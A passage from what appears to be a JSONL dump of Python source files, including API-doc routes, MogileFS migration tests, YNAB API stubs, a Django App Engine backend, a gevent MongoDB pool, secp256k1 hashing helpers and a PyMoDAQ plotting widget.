f\"?pin_code={r_pin_code}\"\n return openapi_json_url\n\n @doc_pait()\n def get_redoc_html(request: Request, r_pin_code: str = Depends.i(_get_request_pin_code)) -> HTMLResponse:\n return HTMLResponse(_get_redoc_html(_get_open_json_url(request, r_pin_code), title))\n\n @doc_pait()\n def get_swagger_ui_html(request: Request, r_pin_code: str = Depends.i(_get_request_pin_code)) -> HTMLResponse:\n return HTMLResponse(_get_swagger_ui_html(_get_open_json_url(request, r_pin_code), title))\n\n @doc_pait(pre_depend_list=[_get_request_pin_code])\n def openapi_route(request: Request) -> JSONResponse:\n pait_dict: Dict[str, PaitCoreModel] = load_app(request.app)\n _scheme: str = scheme or request.url.scheme\n pait_openapi: PaitOpenApi = PaitOpenApi(\n pait_dict,\n title=title,\n open_api_server_list=[{\"url\": f\"{_scheme}://{request.url.hostname}:{request.url.port}\", \"description\": \"\"}],\n open_api_tag_list=open_api_tag_list,\n )\n return JSONResponse(pait_openapi.open_api_dict)\n\n route: Mount = Mount(\n prefix,\n name=\"api doc\",\n routes=[\n Route(\"/redoc\", get_redoc_html, methods=[\"GET\"]),\n Route(\"/swagger\", get_swagger_ui_html, methods=[\"GET\"]),\n Route(\"/openapi.json\", openapi_route, methods=[\"GET\"]),\n ],\n )\n app.routes.append(route)\n"} {"ext": "py", "sha": "1a2f4e390d7cb44e171aa0da52f9bab0974dc7d5", "content": "import hashlib\nimport io\nimport json\nimport tempfile\nfrom random import randint\nfrom unittest.mock import Mock\n\nimport pytest\nimport requests\n\nfrom .shared import (\n guess_mimetype,\n HashWrap,\n MogileFile,\n encode_int,\n future_waiter,\n make_bucket_map,\n maybe_update_max,\n md5_fileobj_b64,\n md5_fileobj_hex,\n sha1_fileobj_b64,\n sha1_fileobj_hex,\n)\n\n\n# pylint: disable=C0115,C0116,R0201\nclass 
TestMigrate:\n MD5_HEX = \"5eb63bbbe01eeed093cb22bb8f5acdc3\"\n SHA1_HEX = \"2aae6c35c94fcfb415dbe95f408b9ce91ee846ed\"\n MD5_B64 = \"XrY7u+Ae7tCTyyK7j1rNww==\"\n SHA1_B64 = \"Kq5sNclPz7QV2+lfQIuc6R7oRu0=\"\n\n @pytest.fixture\n def mogile_client(self):\n mogile_client = Mock()\n paths = Mock()\n mogile_client.get_paths.return_value = paths\n paths.data = {\"paths\": {1: \"http://example.org/1\", 2: \"http://example.org/2\"}}\n return mogile_client\n\n @pytest.fixture\n def gcs_client(self):\n gcs_client = Mock()\n bucket = Mock()\n blob = Mock()\n gcs_client.get_bucket.return_value = bucket\n bucket.get_blob.return_value = blob\n bucket.blob.return_value = blob\n return gcs_client\n\n @pytest.fixture\n def row(self):\n # hello world sha1sum: 2aae6c35c94fcfb415dbe95f408b9ce91ee846ed\n # (fid, dmid, dkey, length, classid, devcount)\n return [1, 1, f\"{self.SHA1_HEX}-mogilefs-prod-repo\", 1593790, 0, 2]\n\n @pytest.yield_fixture\n def my_tempfile(self):\n with tempfile.TemporaryFile() as tmp:\n tmp.write(b\"hello world\")\n yield tmp\n\n @pytest.fixture\n def mogile_file(self):\n return MogileFile(dkey=f\"{self.SHA1_HEX}-repo\", fid=564879786, length=1)\n\n def test_parse_row(self, row):\n file = MogileFile.parse_row(row)\n assert file.sha1sum == self.SHA1_HEX\n assert file.fid == 1\n assert file.length == 1593790\n assert file.dkey == f\"{self.SHA1_HEX}-mogilefs-prod-repo\"\n assert file.skip is False\n assert file.mogile_bucket == \"mogilefs-prod-repo\"\n\n def test_parse_bad_dmid(self, row):\n row[1] = 2\n with pytest.raises(AssertionError, match=\"Bad domain\"):\n MogileFile.parse_row(row)\n\n def test_parse_temp_file(self, row):\n row[2] = \"8d26b4da-bd3e-47eb-888a-13bb3579c7e9.tmp\"\n file = MogileFile.parse_row(row)\n assert file.skip is True\n assert file.mogile_bucket is None\n assert file.sha1sum is None\n\n def test_parse_bad_class(self, row):\n row[4] = 1\n with pytest.raises(AssertionError, match=\"Bad class\"):\n MogileFile.parse_row(row)\n\n def test_make_intermediary_key(self, mogile_file):\n assert mogile_file.make_intermediary_key() == \"0/564/879/0564879786.fid\"\n\n def test_make_contentrepo_key(self, mogile_file):\n assert mogile_file.make_contentrepo_key() == self.SHA1_HEX\n\n def test_exists_in_bucket(self, mogile_file, gcs_client):\n blob = gcs_client.get_bucket().get_blob()\n blob.size = 1\n blob.md5_hash = self.MD5_HEX\n assert (\n mogile_file.exists_in_bucket(gcs_client, \"my-bucket\", \"my-key\")\n == self.MD5_HEX\n )\n\n def test_does_not_exist_in_bucket(self, gcs_client, mogile_file):\n gcs_client.get_bucket().get_blob.return_value = None\n assert mogile_file.exists_in_bucket(gcs_client, \"my-bucket\", \"my-file\") is False\n\n def test_mogile_file_to_json(self, mogile_file):\n assert mogile_file == MogileFile.from_json(json.loads(mogile_file.to_json()))\n\n def test_md5_fileobj(self, my_tempfile):\n assert md5_fileobj_hex(my_tempfile) == self.MD5_HEX\n assert md5_fileobj_b64(my_tempfile) == self.MD5_B64\n\n def test_sha1_fileobj(self, my_tempfile):\n assert sha1_fileobj_hex(my_tempfile) == self.SHA1_HEX\n assert sha1_fileobj_b64(my_tempfile) == self.SHA1_B64\n\n def test_put(\n self, mogile_file: MogileFile, mogile_client, gcs_client, requests_mock\n ):\n requests_mock.get(\"http://example.org/1\", content=b\"hello world\")\n requests_mock.get(\"http://example.org/2\", content=b\"hello world\")\n blob = gcs_client.get_bucket().get_blob()\n\n def upload_from_file(fileobj, *args, **kwargs):\n fileobj.read()\n\n blob.upload_from_file.side_effect = 
upload_from_file\n blob.upload_from_file.return_value = \"xyz\"\n blob.md5_hash = self.MD5_B64\n md5 = mogile_file.put(mogile_client, gcs_client, \"my-bucket\")\n assert md5 == self.MD5_B64\n\n def test_make_bucket_map(self):\n assert make_bucket_map(\"a:b,c:d\") == {\"a\": \"b\", \"c\": \"d\"}\n\n def test_future_waiter(self):\n futures_list = []\n called_times = {}\n for i in range(0, 100):\n future = Mock()\n future.exception.return_value = None\n\n def mk_done(counter):\n called_times[counter] = 0\n return_after = counter % 3\n\n def done():\n called_times[counter] += 1\n return called_times[counter] > return_after\n\n return done\n\n future.done = mk_done(i)\n future.result.return_value = None\n futures_list.append(future)\n passthrough = future_waiter((f for f in futures_list), 10)\n leftovers = list(iter(passthrough))\n assert leftovers == [None] * 100\n\n def test_future_waiter_exception(self):\n with pytest.raises(Exception, match=\"huh\"):\n futures_list = []\n for i in range(0, 10):\n future = Mock()\n future.exception.return_value = None\n future.done.return_value = True\n future.result.return_value = None\n if i == 5:\n future.exception.return_value = Exception(\"huh\")\n futures_list.append(future)\n\n passthrough = future_waiter((f for f in futures_list), 10)\n leftovers = list(iter(passthrough))\n\n def test_hash_wrap(self):\n bio = io.BytesIO(b\"hello world\")\n md5 = hashlib.md5()\n with HashWrap(bio, md5) as pipe:\n assert pipe.read() == b\"hello world\"\n assert md5.hexdigest() == \"5eb63bbbe01eeed093cb22bb8f5acdc3\"\n\n def test_hash_wrap_requests(self, requests_mock):\n requests_mock.get(\"http://example.org/1\", content=b\"hello world\")\n with requests.get(\"http://example.org/1\", stream=True) as req:\n req.raise_for_status()\n sha1 = hashlib.sha1()\n req.raw.decode_content = True\n with HashWrap(req.raw, sha1) as pipe:\n assert \"hello world\" == pipe.read().decode(\"utf-8\")\n assert sha1.hexdigest() == \"2aae6c35c94fcfb415dbe95f408b9ce91ee846ed\"\n\n def test_encode_int(self):\n assert b\"100\" == encode_int(100)\n i = randint(0, 100000000000)\n assert i == int(encode_int(i))\n\n def test_maybe_update_max(self):\n db = {}\n maybe_update_max(db, \"last\", 1)\n assert db[\"last\"] == b\"1\"\n\n db = {\"last\": b\"1\"}\n maybe_update_max(db, \"last\", 2)\n assert db[\"last\"] == b\"2\"\n\n db = {\"last\": b\"2\"}\n maybe_update_max(db, \"last\", 1)\n assert db[\"last\"] == b\"2\"\n\n def test_guess_mimetype(self):\n assert \"image/png\" == guess_mimetype(\n \"corpus-dev-0242ac130003/10.1371/image.pbio.v01.i01/1/image.pbio.v01.i01.g001.PNG_I\"\n )\n assert \"image/png\" == guess_mimetype(\n \"gs:///corpus-dev-0242ac130003/10.1371/image.pbio.v01.i01/1/image.pbio.v01.i01.g001.PNG_I\"\n )\n assert \"image/png\" == guess_mimetype(\"image.pbio.v01.i01.g001.PNG_I\")\n assert \"image/png\" == guess_mimetype(\"image.pbio.v01.i01.g001.PNG\")\n assert \"image/png\" == guess_mimetype(\"image.pbio.v01.i01.g001.PNG_I\")\n assert \"application/octet-stream\" == guess_mimetype(\"foo\")\n assert \"text/csv\" == guess_mimetype(\"foo.csv\")\n assert \"text/html\" == guess_mimetype(\"foo.html\")\n"} {"ext": "py", "sha": "1a2f4ea64c703fedcd44794e9fafec9ff20acd56", "content": "# coding: utf-8\n\n\"\"\"\n YNAB API Endpoints\n\n Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. 
API Documentation is at https://api.youneedabudget.com # noqa: E501\n\n OpenAPI spec version: 1.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport ynab_moka\nfrom ynab_moka.api.scheduled_transactions_api import ScheduledTransactionsApi # noqa: E501\nfrom ynab_moka.rest import ApiException\n\n\nclass TestScheduledTransactionsApi(unittest.TestCase):\n \"\"\"ScheduledTransactionsApi unit test stubs\"\"\"\n\n def setUp(self):\n self.api = ynab_moka.api.scheduled_transactions_api.ScheduledTransactionsApi() # noqa: E501\n\n def tearDown(self):\n pass\n\n def test_get_scheduled_transaction_by_id(self):\n \"\"\"Test case for get_scheduled_transaction_by_id\n\n Single scheduled transaction # noqa: E501\n \"\"\"\n pass\n\n def test_get_scheduled_transactions(self):\n \"\"\"Test case for get_scheduled_transactions\n\n List scheduled transactions # noqa: E501\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f4f23daa5ac8ae414785f7aaf8ca3a86222bb", "content": "from ..boot import DATA_ROOT\nfrom ..utils import appid, on_production_server\nfrom .creation import DatabaseCreation\nfrom .stubs import stub_manager\nfrom django.db.backends.util import format_number\nfrom djangotoolbox.db.base import NonrelDatabaseFeatures, \\\n NonrelDatabaseOperations, NonrelDatabaseWrapper, NonrelDatabaseClient, \\\n NonrelDatabaseValidation, NonrelDatabaseIntrospection\nfrom google.appengine.ext.db.metadata import get_kinds, get_namespaces\nfrom google.appengine.api.datastore import Query, Delete\nfrom google.appengine.api.namespace_manager import set_namespace\nimport logging\nimport os\n\nDATASTORE_PATHS = {\n 'datastore_path': os.path.join(DATA_ROOT, 'datastore'),\n 'blobstore_path': os.path.join(DATA_ROOT, 'blobstore'),\n 'rdbms_sqlite_path': os.path.join(DATA_ROOT, 'rdbms'),\n 'prospective_search_path': os.path.join(DATA_ROOT, 'prospective-search'),\n}\n\ndef get_datastore_paths(options):\n paths = {}\n for key, path in DATASTORE_PATHS.items():\n paths[key] = options.get(key, path)\n return paths\n\ndef destroy_datastore(paths):\n \"\"\"Destroys the appengine datastore at the specified paths.\"\"\"\n for path in paths.values():\n if not path:\n continue\n try:\n os.remove(path)\n except OSError, error:\n if error.errno != 2:\n logging.error(\"Failed to clear datastore: %s\" % error)\n\nclass DatabaseFeatures(NonrelDatabaseFeatures):\n allows_primary_key_0 = True\n supports_dicts = True\n\nclass DatabaseOperations(NonrelDatabaseOperations):\n compiler_module = __name__.rsplit('.', 1)[0] + '.compiler'\n\n DEFAULT_MAX_DIGITS = 16\n\n def value_to_db_decimal(self, value, max_digits, decimal_places):\n if value is None:\n return None\n sign = value < 0 and u'-' or u''\n if sign: \n value = abs(value)\n if max_digits is None: \n max_digits = self.DEFAULT_MAX_DIGITS\n\n if decimal_places is None:\n value = unicode(value)\n else:\n value = format_number(value, max_digits, decimal_places)\n decimal_places = decimal_places or 0\n n = value.find('.')\n\n if n < 0:\n n = len(value)\n if n < max_digits - decimal_places:\n value = u\"0\" * (max_digits - decimal_places - n) + value\n return sign + value\n\n def sql_flush(self, style, tables, sequences):\n self.connection.flush()\n return []\n\nclass DatabaseClient(NonrelDatabaseClient):\n pass\n\nclass DatabaseValidation(NonrelDatabaseValidation):\n pass\n\nclass DatabaseIntrospection(NonrelDatabaseIntrospection):\n def 
table_names(self):\n \"\"\"Returns a list of names of all tables that exist in the database.\"\"\"\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]\n\nclass DatabaseWrapper(NonrelDatabaseWrapper):\n def __init__(self, *args, **kwds):\n super(DatabaseWrapper, self).__init__(*args, **kwds)\n self.features = DatabaseFeatures(self)\n self.ops = DatabaseOperations(self)\n self.client = DatabaseClient(self)\n self.creation = DatabaseCreation(self)\n self.validation = DatabaseValidation(self)\n self.introspection = DatabaseIntrospection(self)\n options = self.settings_dict\n self.remote_app_id = options.get('REMOTE_APP_ID', appid)\n self.domain = options.get('DOMAIN', 'appspot.com')\n self.remote_api_path = options.get('REMOTE_API_PATH', None)\n self.secure_remote_api = options.get('SECURE_REMOTE_API', True)\n\n remote = options.get('REMOTE', False)\n if on_production_server:\n remote = False\n if remote:\n stub_manager.setup_remote_stubs(self)\n else:\n stub_manager.setup_stubs(self)\n\n def flush(self):\n \"\"\"Helper function to remove the current datastore and re-open the stubs\"\"\"\n if stub_manager.active_stubs == 'remote':\n import random\n import string\n code = ''.join([random.choice(string.ascii_letters) for x in range(4)])\n print '\\n\\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'\n print '!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'\n print \"Warning! You're about to delete the *production* datastore!\"\n print 'Only models defined in your INSTALLED_APPS can be removed!'\n print 'If you want to clear the whole datastore you have to use the ' \\\n 'datastore viewer in the dashboard. Also, in order to delete all '\\\n 'unneeded indexes you have to run appcfg.py vacuum_indexes.'\n print 'In order to proceed you have to enter the following code:'\n print code\n response = raw_input('Repeat: ')\n if code == response:\n print 'Deleting...'\n delete_all_entities()\n print \"Datastore flushed! 
Please check your dashboard's \" \\\n 'datastore viewer for any remaining entities and remove ' \\\n 'all unneeded indexes with manage.py vacuum_indexes.'\n else:\n print 'Aborting'\n exit()\n elif stub_manager.active_stubs == 'test':\n stub_manager.deactivate_test_stubs()\n stub_manager.activate_test_stubs()\n else:\n destroy_datastore(get_datastore_paths(self.settings_dict))\n stub_manager.setup_local_stubs(self)\n\ndef delete_all_entities():\n for namespace in get_namespaces():\n set_namespace(namespace)\n for kind in get_kinds():\n if kind.startswith('__'):\n continue\n while True:\n data = Query(kind=kind, keys_only=True).Get(200)\n if not data:\n break\n Delete(data)"} {"ext": "py", "sha": "1a2f4f50819b315f2c0f7883438652987d3e892e", "content": "# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import annotations\n\nimport itertools\n\nfrom pants.backend.python.goals import lockfile\nfrom pants.backend.python.goals.lockfile import GeneratePythonLockfile\nfrom pants.backend.python.subsystems.python_tool_base import PythonToolBase\nfrom pants.backend.python.subsystems.setup import PythonSetup\nfrom pants.backend.python.target_types import ConsoleScript, InterpreterConstraintsField\nfrom pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints\nfrom pants.core.goals.generate_lockfiles import GenerateToolLockfileSentinel\nfrom pants.engine.rules import Get, collect_rules, rule\nfrom pants.engine.target import AllTargets, AllTargetsRequest\nfrom pants.engine.unions import UnionRule\nfrom pants.util.docutil import git_url\nfrom pants.util.logging import LogLevel\n\n\nclass IPython(PythonToolBase):\n options_scope = \"ipython\"\n help = \"The IPython enhanced REPL (https://ipython.org/).\"\n\n default_version = \"ipython==7.16.1\" # The last version to support Python 3.6.\n default_main = ConsoleScript(\"ipython\")\n\n register_lockfile = True\n default_lockfile_resource = (\"pants.backend.python.subsystems\", \"ipython_lockfile.txt\")\n default_lockfile_path = \"src/python/pants/backend/python/subsystems/ipython_lockfile.txt\"\n default_lockfile_url = git_url(default_lockfile_path)\n\n @classmethod\n def register_options(cls, register):\n super().register_options(register)\n register(\n \"--ignore-cwd\",\n type=bool,\n advanced=True,\n default=True,\n help=\"Whether to tell IPython not to put the CWD on the import path.\\n\\n\"\n \"Normally you want this to be True, so that imports come from the hermetic \"\n \"environment Pants creates.\\n\\nHowever IPython<7.13.0 doesn't support this option, \"\n \"so if you're using an earlier version (e.g., because you have Python 2.7 code) \"\n \"then you will need to set this to False, and you may have issues with imports \"\n \"from your CWD shading the hermetic environment.\",\n )\n\n\nclass IPythonLockfileSentinel(GenerateToolLockfileSentinel):\n resolve_name = IPython.options_scope\n\n\n@rule(\n desc=(\n \"Determine all Python interpreter versions used by iPython in your project (for lockfile \"\n \"usage)\"\n ),\n level=LogLevel.DEBUG,\n)\nasync def setup_ipython_lockfile(\n _: IPythonLockfileSentinel, ipython: IPython, python_setup: PythonSetup\n) -> GeneratePythonLockfile:\n if not ipython.uses_lockfile:\n return GeneratePythonLockfile.from_tool(ipython)\n\n # IPython is often run against the whole repo (`./pants repl ::`), but it is possible to run\n # on subsets of the codebase with disjoint interpreter 
constraints, such as\n # `./pants repl py2::` and then `./pants repl py3::`. Still, even with those subsets possible,\n # we need a single lockfile that works with all possible Python interpreters in use.\n #\n # This ORs all unique interpreter constraints. The net effect is that every possible Python\n # interpreter used will be covered.\n all_tgts = await Get(AllTargets, AllTargetsRequest())\n unique_constraints = {\n InterpreterConstraints.create_from_compatibility_fields(\n [tgt[InterpreterConstraintsField]], python_setup\n )\n for tgt in all_tgts\n if tgt.has_field(InterpreterConstraintsField)\n }\n constraints = InterpreterConstraints(itertools.chain.from_iterable(unique_constraints))\n return GeneratePythonLockfile.from_tool(\n ipython, constraints or InterpreterConstraints(python_setup.interpreter_constraints)\n )\n\n\ndef rules():\n return (\n *collect_rules(),\n *lockfile.rules(),\n UnionRule(GenerateToolLockfileSentinel, IPythonLockfileSentinel),\n )\n"} {"ext": "py", "sha": "1a2f4f774438953a0317b8d2432ecb4bd54a4d42", "content": "import os\n\nfrom acres.model import topic_list\n\n\ndef test_parse():\n topics = topic_list.parse(\"tests/resources/test_topics.tsv\")\n types = topic_list.unique_types(topics)\n assert 'EKG' in types\n\n\ndef test_create_topic_list(ngramstat):\n filename = \"tests/resources/ngram_topics.tsv\"\n topic_list.create(filename, 1.0, 3)\n assert os.path.exists(filename)\n assert os.path.getsize(filename) > 10\n"} {"ext": "py", "sha": "1a2f4f86bc4e5affbf717e120dd623459b963145", "content": "# Copyright 2011 10gen\n# \n# Modified by Antonin Amand to work with gevent.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport pymongo.connection\nfrom gevent.hub import getcurrent\nimport gevent.queue\nimport gevent.greenlet\nimport gevent.local\nimport gevent.coros\nfrom gevent import socket\nimport weakref\n\n\nclass Pool(object):\n \"\"\" A greenlet safe connection pool for gevent (non-thread safe).\n \"\"\"\n\n DEFAULT_TIMEOUT = 3.0\n\n def __init__(self, pool_size, network_timeout=None):\n self.network_timeout = network_timeout or self.DEFAULT_TIMEOUT\n self.pool_size = pool_size\n self._bootstrap(os.getpid())\n self._lock = gevent.coros.RLock()\n\n def _bootstrap(self, pid):\n self._count = 0\n self._pid = pid\n self._used = {}\n self._queue = gevent.queue.Queue(self.pool_size)\n\n def connect(self, host, port):\n \"\"\"Connect to Mongo and return a new (connected) socket.\n \"\"\"\n try:\n # Prefer IPv4. 
If there is demand for an option\n # to specify one or the other we can add it later.\n s = socket.socket(socket.AF_INET)\n s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n s.settimeout(self.network_timeout or \n pymongo.connection._CONNECT_TIMEOUT)\n s.connect((host, port))\n s.settimeout(self.network_timeout)\n return s\n except socket.gaierror:\n # If that fails try IPv6\n s = socket.socket(socket.AF_INET6)\n s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n s.settimeout(self.network_timeout or \n pymongo.connection._CONNECT_TIMEOUT)\n s.connect((host, port))\n s.settimeout(self.network_timeout)\n return s\n\n def get_socket(self, host, port):\n pid = os.getpid()\n if pid != self._pid:\n self._bootstrap(pid)\n\n greenlet = getcurrent()\n from_pool = True\n sock = self._used.get(greenlet)\n if sock is None:\n with self._lock:\n if self._count < self.pool_size:\n self._count += 1\n from_pool = False\n sock = self.connect(host, port)\n if sock is None:\n from_pool = True\n sock = self._queue.get(timeout=self.network_timeout)\n\n if isinstance(greenlet, gevent.Greenlet):\n greenlet.link(self._return)\n self._used[greenlet] = sock\n else:\n ref = weakref.ref(greenlet, self._return)\n self._used[ref] = sock\n return sock, from_pool\n\n def return_socket(self):\n greenlet = getcurrent()\n self._return(greenlet)\n\n def _return(self, greenlet):\n try:\n sock = self._used.get(greenlet)\n if sock is not None:\n del self._used[greenlet]\n self._queue.put(sock)\n except:\n with self._lock:\n self._count -= 1\n\n\ndef patch():\n import pymongo.connection\n pymongo.connection._Pool = Pool\n\n"} {"ext": "py", "sha": "1a2f4f92a113636a896106383cfcf97573818685", "content": "from buidl._libsec import ffi, lib\n\n\nGLOBAL_CTX = ffi.gc(\n lib.secp256k1_context_create(\n lib.SECP256K1_CONTEXT_SIGN | lib.SECP256K1_CONTEXT_VERIFY\n ),\n lib.secp256k1_context_destroy,\n)\n\n\ndef tagged_hash(tag, msg):\n result = ffi.new(\"unsigned char [32]\")\n tag_length = len(tag)\n msg_length = len(msg)\n if not lib.secp256k1_tagged_sha256(\n GLOBAL_CTX,\n result,\n tag,\n tag_length,\n msg,\n msg_length,\n ):\n raise RuntimeError(\"libsecp256k1 tagged hash problem\")\n return bytes(ffi.buffer(result, 32))\n\n\ndef hash_aux(msg):\n return tagged_hash(b\"BIP0340/aux\", msg)\n\n\ndef hash_challenge(msg):\n return tagged_hash(b\"BIP0340/challenge\", msg)\n\n\ndef hash_keyaggcoef(msg):\n return tagged_hash(b\"KeyAgg coefficient\", msg)\n\n\ndef hash_keyagglist(msg):\n return tagged_hash(b\"KeyAgg list\", msg)\n\n\ndef hash_musignonce(msg):\n return tagged_hash(b\"MuSig/noncecoef\", msg)\n\n\ndef hash_nonce(msg):\n return tagged_hash(b\"BIP0340/nonce\", msg)\n\n\ndef hash_tapbranch(msg):\n return tagged_hash(b\"TapBranch\", msg)\n\n\ndef hash_tapleaf(msg):\n return tagged_hash(b\"TapLeaf\", msg)\n\n\ndef hash_tapsighash(msg):\n return tagged_hash(b\"TapSighash\", msg)\n\n\ndef hash_taptweak(msg):\n return tagged_hash(b\"TapTweak\", msg)\n"} {"ext": "py", "sha": "1a2f4f94f3c75c8f9e9d1fa2053fef78511e680e", "content": "from PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QObject, pyqtSlot, pyqtSignal, QLocale, Qt\nfrom PyQt5.QtWidgets import QPushButton, QLabel\nfrom PyQt5.QtGui import QIcon, QPixmap\nimport sys\n\nfrom pymodaq.daq_utils.parameter import utils as putils\nfrom pymodaq.daq_measurement.daq_measurement_main import DAQ_Measurement\nfrom collections import OrderedDict\nfrom pymodaq.daq_utils.plotting.crosshair import Crosshair\nimport pyqtgraph as pg\nimport numpy as np\nfrom pymodaq.daq_utils import 
daq_utils as utils\nfrom pymodaq.daq_utils.gui_utils import QAction\nfrom pymodaq.daq_utils.plotting.viewer1D.viewer1Dbasic import Viewer1DBasic\nfrom pymodaq.daq_utils.managers.roi_manager import ROIManager\nimport datetime\n\nlogger = utils.set_logger(utils.get_module_name(__file__))\n\n\nclass Viewer1D(QtWidgets.QWidget, QObject):\n \"\"\"this plots 1D data on a plotwidget. Math and measurement can be done on it. Datas and measurements are then exported with the signal\n data_to_export_signal\n \"\"\"\n\n data_to_export_signal = pyqtSignal(OrderedDict) # self.data_to_export=edict(data0D=None,data1D=None,data2D=None)\n math_signal = pyqtSignal(OrderedDict) # OrderedDict:=[x_axis=...,data=...,ROI_bounds=...,operation=]\n ROI_changed = pyqtSignal()\n ROI_changed_finished = pyqtSignal()\n\n def __init__(self, parent=None):\n QLocale.setDefault(QLocale(QLocale.English, QLocale.UnitedStates))\n super(Viewer1D, self).__init__()\n\n self.viewer_type = 'Data1D'\n self.title = 'viewer1D'\n if parent is None:\n parent = QtWidgets.QWidget()\n self.parent = parent\n\n self.roi_manager = ROIManager('1D')\n self.roi_manager.new_ROI_signal.connect(self.add_lineout)\n self.roi_manager.remove_ROI_signal.connect(self.remove_ROI)\n # self.roi_manager.ROI_changed_finished.connect(self.update_lineouts)\n\n self.setupUI()\n\n self.wait_time = 3000\n self.measurement_module = None\n\n self.math_module = Viewer1D_math()\n\n if DAQ_Measurement is None: # pragma: no cover\n self.ui.do_measurements_pb.setVisible(False)\n\n self._labels = []\n self.plot_channels = None\n self.plot_colors = utils.plot_colors\n self.color_list = ROIManager.color_list\n self.lo_items = OrderedDict([])\n self.lo_data = OrderedDict([])\n self.ROI_bounds = []\n\n self._x_axis = None\n\n self.datas = [] # datas on each channel. 
list of 1D arrays\n self.data_to_export = None\n self.measurement_dict = OrderedDict(x_axis=None, datas=[], ROI_bounds=[], operations=[], channels=[])\n # OrderedDict to be send to the daq_measurement module\n self.measure_data_dict = OrderedDict()\n # dictionnary with data to be put in the table on the form: key=\"Meas.{}:\".format(ind)\n # and value is the result of a given lineout or measurement\n\n def setupUI(self):\n\n self.ui = QObject()\n\n self.parent.setLayout(QtWidgets.QVBoxLayout())\n splitter_hor = QtWidgets.QSplitter(Qt.Horizontal)\n\n # self.ui.statusbar = QtWidgets.QStatusBar()\n # self.ui.statusbar.setMaximumHeight(15)\n\n self.parent.layout().addWidget(splitter_hor)\n #self.parent.layout().addWidget(self.ui.statusbar)\n\n\n splitter_ver = QtWidgets.QSplitter(Qt.Vertical)\n splitter_hor.addWidget(splitter_ver)\n splitter_hor.addWidget(self.roi_manager.roiwidget)\n self.roi_manager.roiwidget.hide()\n\n\n self.ui.button_widget = QtWidgets.QToolBar()\n\n\n splitter_ver.addWidget(self.ui.button_widget)\n\n self.ui.Graph_Lineouts = pg.PlotWidget()\n\n widg = QtWidgets.QWidget()\n self.viewer = Viewer1DBasic(widg)\n splitter_ver.addWidget(widg)\n splitter_ver.addWidget(self.ui.Graph_Lineouts)\n self.ui.Graph1D = self.viewer # for backcompatibility\n self.roi_manager.viewer_widget = self.viewer.plotwidget\n\n self.setup_buttons(self.ui.button_widget)\n self.setup_zoom()\n\n self.legend = None\n self.axis_settings = dict(orientation='bottom', label='x axis', units='pxls')\n\n self.ui.xaxis_item = self.viewer.plotwidget.plotItem.getAxis('bottom')\n self.ui.Graph_Lineouts.hide()\n\n self.ui.aspect_ratio_pb.clicked.connect(self.lock_aspect_ratio)\n\n # #crosshair\n self.ui.crosshair = Crosshair(self.viewer.plotwidget.plotItem, orientation='vertical')\n self.ui.crosshair.crosshair_dragged.connect(self.update_crosshair_data)\n self.ui.crosshair_pb.clicked.connect(self.crosshairClicked)\n self.crosshairClicked()\n\n # self.ui.Measurement_widget=Dock(\"Measurement Module\", size=(300, 100), closable=True)\n # self.dockarea.addDock(self.ui.Measurement_widget)\n self.ui.Measurement_widget = QtWidgets.QWidget()\n self.ui.Measurement_widget.setVisible(False)\n\n # #Connecting buttons:\n self.ui.Do_math_pb.clicked.connect(self.do_math_fun)\n self.ui.do_measurements_pb.clicked.connect(self.open_measurement_module)\n self.ui.zoom_pb.clicked.connect(self.enable_zoom)\n self.ui.scatter.clicked.connect(self.do_scatter)\n self.ui.xyplot_action.triggered.connect(self.do_xy)\n\n def setup_buttons(self, button_widget):\n\n self.ui.zoom_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/Zoom_to_Selection.png\")), 'Zoom Widget')\n self.ui.zoom_pb.setCheckable(True)\n button_widget.addAction(self.ui.zoom_pb)\n\n self.ui.Do_math_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/Calculator.png\")), 'Do Math using ROI')\n self.ui.Do_math_pb.setCheckable(True)\n button_widget.addAction(self.ui.Do_math_pb)\n\n self.ui.do_measurements_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/MeasurementStudio_32.png\")),\n 'Do Advanced measurements (fits,...)')\n self.ui.do_measurements_pb.setCheckable(True)\n button_widget.addAction(self.ui.do_measurements_pb)\n\n self.ui.crosshair_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/reset.png\")),\n 'Show data cursor')\n self.ui.crosshair_pb.setCheckable(True)\n button_widget.addAction(self.ui.crosshair_pb)\n\n self.ui.aspect_ratio_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/zoomReset.png\")),\n 'Fix the aspect ratio')\n 
